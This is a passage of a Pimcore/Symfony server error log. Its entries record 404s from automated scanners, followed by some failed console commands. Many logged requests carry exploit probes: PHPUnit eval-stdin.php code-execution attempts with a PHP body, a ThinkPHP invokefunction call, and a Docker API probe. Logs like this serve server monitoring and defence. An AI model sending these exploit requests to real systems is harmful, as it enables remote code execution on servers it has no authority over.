echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.841988+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:14.984050+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.120475+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.263294+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.400095+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.541032+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.690515+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.859690+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:15.995034+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.134576+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.275596+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.413537+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.553460+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.689452+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nContent-Length:            33\r\nContent-Type:              text/plain\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n<?php echo(md5(\"Hello PHPUnit\")); at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:16.912120+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/public/index.php"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/public/index.php\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T16:11:17.187341+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/containers/json"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/containers/json\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /containers/json HTTP/1.1\r\nAccept:                    */*\r\nConnection:                keep-alive\r\nHost:                      35.219.88.188:80\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent:                Custom-AsyncHttpClient\r\nX-Php-Ob-Level:            1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T17:36:35.803208+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST http://35.219.88.188/any"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST http://35.219.88.188/any\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nPOST /any HTTP/1.1\r\nAccept:          */*\r\nAccept-Encoding: gzip\r\nContent-Length:  4\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 zgrab/0.x\r\nX-Php-Ob-Level:  1\r\n\r\nTEST at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T18:24:41.633511+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/version"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/version\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /version HTTP/1.1\r\nAccept:         */*\r\nHost:           35.219.88.188:80\r\nX-Php-Ob-Level: 1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T18:24:42.816854+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET http://35.219.88.188/v1"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET http://35.219.88.188/v1\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /v1 HTTP/1.1\r\nAccept:         */*\r\nHost:           35.219.88.188:80\r\nX-Php-Ob-Level: 1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-22T23:13:51.698440+00:00] console.CRITICAL: Error thrown while running command "'pimcore:bundle:enable' PimcoreAdminBundle". Message: "Command "pimcore:bundle:enable" is not defined.  Did you mean one of these?     pimcore:bundle:install     pimcore:bundle:list     pimcore:bundle:uninstall" {"exception":"[object] (Symfony\\Component\\Console\\Exception\\CommandNotFoundException(code: 0): Command \"pimcore:bundle:enable\" is not defined.\n\nDid you mean one of these?\n    pimcore:bundle:install\n    pimcore:bundle:list\n    pimcore:bundle:uninstall at /var/www/pimcore/vendor/symfony/console/Application.php:737)","command":"'pimcore:bundle:enable' PimcoreAdminBundle","message":"Command \"pimcore:bundle:enable\" is not defined.\n\nDid you mean one of these?\n    pimcore:bundle:install\n    pimcore:bundle:list\n    pimcore:bundle:uninstall"} []
[2025-04-22T23:14:30.146790+00:00] console.CRITICAL: Error thrown while running command "pimcore:bundle:install". Message: "Not enough arguments (missing: "bundle")." {"exception":"[object] (Symfony\\Component\\Console\\Exception\\RuntimeException(code: 0): Not enough arguments (missing: \"bundle\"). at /var/www/pimcore/vendor/symfony/console/Input/Input.php:77)","command":"pimcore:bundle:install","message":"Not enough arguments (missing: \"bundle\")."} []
[2025-04-22T23:21:34.469424+00:00] console.CRITICAL: Error thrown while running command "'pimcore:install'". Message: "Command "pimcore:install" is not defined.  Did you mean one of these?     assets:install     pimcore:assets:generate-checksums     pimcore:assets:remove-custom-setting     pimcore:build:classes     pimcore:bundle:install     pimcore:bundle:list     pimcore:bundle:uninstall     pimcore:cache:clear     pimcore:cache:warming     pimcore:classificationstore:delete-store     pimcore:definition:import:class     pimcore:definition:import:customlayout     pimcore:definition:import:fieldcollection     pimcore:definition:import:objectbrick     pimcore:definition:import:units     pimcore:deployment:classes-rebuild     pimcore:documents:cleanup     pimcore:documents:generate-page-previews     pimcore:documents:generate-static-pages     pimcore:documents:migrate-elements     pimcore:email:cleanup     pimcore:image:low-quality-preview     pimcore:image:svg-preview     pimcore:locale:delete-unused-tables     pimcore:maintenance     pimcore:maintenance-mode     pimcore:migrate:storage     pimcore:migrate:thumbnails-folder-structure     pimcore:mysql-tools     pimcore:recyclebin:cleanup     pimcore:run-script     pimcore:search-backend-reindex     pimcore:system:requirements:check     pimcore:thumbnails:clear     pimcore:thumbnails:image     pimcore:thumbnails:optimize-images     pimcore:thumbnails:video     pimcore:user:reset-password     pimcore:workflow:dump" {"exception":"[object] (Symfony\\Component\\Console\\Exception\\CommandNotFoundException(code: 0): Command \"pimcore:install\" is not defined.\n\nDid you mean one of these?\n    assets:install\n    pimcore:assets:generate-checksums\n    pimcore:assets:remove-custom-setting\n    pimcore:build:classes\n    pimcore:bundle:install\n    pimcore:bundle:list\n    pimcore:bundle:uninstall\n    pimcore:cache:clear\n    pimcore:cache:warming\n    pimcore:classificationstore:delete-store\n    pimcore:definition:import:class\n    pimcore:definition:import:customlayout\n    pimcore:definition:import:fieldcollection\n    pimcore:definition:import:objectbrick\n    pimcore:definition:import:units\n    pimcore:deployment:classes-rebuild\n    pimcore:documents:cleanup\n    pimcore:documents:generate-page-previews\n    pimcore:documents:generate-static-pages\n    pimcore:documents:migrate-elements\n    pimcore:email:cleanup\n    pimcore:image:low-quality-preview\n    pimcore:image:svg-preview\n    pimcore:locale:delete-unused-tables\n    pimcore:maintenance\n    pimcore:maintenance-mode\n    pimcore:migrate:storage\n    pimcore:migrate:thumbnails-folder-structure\n    pimcore:mysql-tools\n    pimcore:recyclebin:cleanup\n    pimcore:run-script\n    pimcore:search-backend-reindex\n    pimcore:system:requirements:check\n    pimcore:thumbnails:clear\n    pimcore:thumbnails:image\n    pimcore:thumbnails:optimize-images\n    pimcore:thumbnails:video\n    pimcore:user:reset-password\n    pimcore:workflow:dump at /var/www/pimcore/vendor/symfony/console/Application.php:737)","command":"'pimcore:install'","message":"Command \"pimcore:install\" is not defined.\n\nDid you mean one of these?\n    assets:install\n    pimcore:assets:generate-checksums\n    pimcore:assets:remove-custom-setting\n    pimcore:build:classes\n    pimcore:bundle:install\n    pimcore:bundle:list\n    pimcore:bundle:uninstall\n    pimcore:cache:clear\n    pimcore:cache:warming\n    pimcore:classificationstore:delete-store\n    pimcore:definition:import:class\n    pimcore:definition:import:customlayout\n    pimcore:definition:import:fieldcollection\n    pimcore:definition:import:objectbrick\n    pimcore:definition:import:units\n    pimcore:deployment:classes-rebuild\n    pimcore:documents:cleanup\n    pimcore:documents:generate-page-previews\n    pimcore:documents:generate-static-pages\n    pimcore:documents:migrate-elements\n    pimcore:email:cleanup\n    pimcore:image:low-quality-preview\n    pimcore:image:svg-preview\n    pimcore:locale:delete-unused-tables\n    pimcore:maintenance\n    pimcore:maintenance-mode\n    pimcore:migrate:storage\n    pimcore:migrate:thumbnails-folder-structure\n    pimcore:mysql-tools\n    pimcore:recyclebin:cleanup\n    pimcore:run-script\n    pimcore:search-backend-reindex\n    pimcore:system:requirements:check\n    pimcore:thumbnails:clear\n    pimcore:thumbnails:image\n    pimcore:thumbnails:optimize-images\n    pimcore:thumbnails:video\n    pimcore:user:reset-password\n    pimcore:workflow:dump"} []
[2025-04-22T23:21:38.663355+00:00] console.CRITICAL: Error thrown while running command "'assetic:dump'". Message: "There are no commands defined in the "assetic" namespace.  Did you mean this?     assets" {"exception":"[object] (Symfony\\Component\\Console\\Exception\\NamespaceNotFoundException(code: 0): There are no commands defined in the \"assetic\" namespace.\n\nDid you mean this?\n    assets at /var/www/pimcore/vendor/symfony/console/Application.php:669)","command":"'assetic:dump'","message":"There are no commands defined in the \"assetic\" namespace.\n\nDid you mean this?\n    assets"} []
[2025-04-22T23:21:53.463452+00:00] console.CRITICAL: Error thrown while running command "'assets:dump'". Message: "Command "assets:dump" is not defined.  Did you mean one of these?     assets:install     config:dump-reference     server:dump" {"exception":"[object] (Symfony\\Component\\Console\\Exception\\CommandNotFoundException(code: 0): Command \"assets:dump\" is not defined.\n\nDid you mean one of these?\n    assets:install\n    config:dump-reference\n    server:dump at /var/www/pimcore/vendor/symfony/console/Application.php:737)","command":"'assets:dump'","message":"Command \"assets:dump\" is not defined.\n\nDid you mean one of these?\n    assets:install\n    config:dump-reference\n    server:dump"} []
[2025-04-23T05:09:00.747954+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/sitemap.xml"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/sitemap.xml\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /sitemap.xml HTTP/1.1\r\nAccept:          text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nAccept-Encoding: gzip\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
[2025-04-23T05:09:01.313554+00:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://35.219.88.188/config.json"" at RouterListener.php line 127 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET https://35.219.88.188/config.json\" at /var/www/pimcore/vendor/symfony/http-kernel/EventListener/RouterListener.php:127)\n[previous exception] [object] (Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): None of the routers in the chain matched this request\nGET /config.json HTTP/1.1\r\nAccept:          text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nAccept-Encoding: gzip\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\r\nHost:            35.219.88.188\r\nUser-Agent:      Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\nX-Php-Ob-Level:  1\r\n\r\n at /var/www/pimcore/vendor/symfony-cmf/routing/src/ChainRouter.php:180)"} []
